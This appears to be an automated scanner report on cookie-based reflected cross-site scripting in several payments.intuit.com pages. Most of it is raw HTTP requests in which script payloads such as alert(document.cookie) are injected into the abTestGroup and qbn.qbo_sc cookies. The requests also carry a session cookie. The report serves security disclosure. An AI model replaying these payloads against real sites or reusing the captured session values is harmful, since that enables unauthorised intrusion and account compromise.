qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T162cec2"><script>alert(1)</script>271f29d1570;
The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload 3073f<script>alert(1)</script>daf5c68037 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /products/quickbooks-payment-solutions/process-card-payments-for-mac.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T163073f<script>alert(1)</script>daf5c68037;
The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload a853f<script>alert(1)</script>6d2e750d194 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /products/quickbooks-payment-solutions/quickbooks-online-billing.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16a853f<script>alert(1)</script>6d2e750d194;
The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bda72"><script>alert(1)</script>0bd96e557df was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /products/quickbooks-payment-solutions/quickbooks-online-billing.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16bda72"><script>alert(1)</script>0bd96e557df;
The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload 49004<script>alert(1)</script>a5a17e50b33 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /products/quickbooks-payment-solutions/web-credit-card-processing.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T1649004<script>alert(1)</script>a5a17e50b33;
The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2219"><script>alert(1)</script>d85e888e13e was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /products/quickbooks-payment-solutions/web-credit-card-processing.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16d2219"><script>alert(1)</script>d85e888e13e;
The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c79ad"><script>alert(1)</script>e8785a94aac was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /support/ HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16c79ad"><script>alert(1)</script>e8785a94aac;
The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload 77a3a<script>alert(1)</script>eb661626a4c was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /support/ HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T1677a3a<script>alert(1)</script>eb661626a4c;
The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload b0496<script>alert(1)</script>bc940e2dae4 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /support/glossary.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16b0496<script>alert(1)</script>bc940e2dae4;
The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb67a"><script>alert(1)</script>411f1d9182d was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /support/glossary.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16bb67a"><script>alert(1)</script>411f1d9182d;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /?launchHelpMeChoose=true HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /apply-now/ HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /apply-now/check-warranty-apply-now.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /apply-now/contact-me.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /products/ HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; 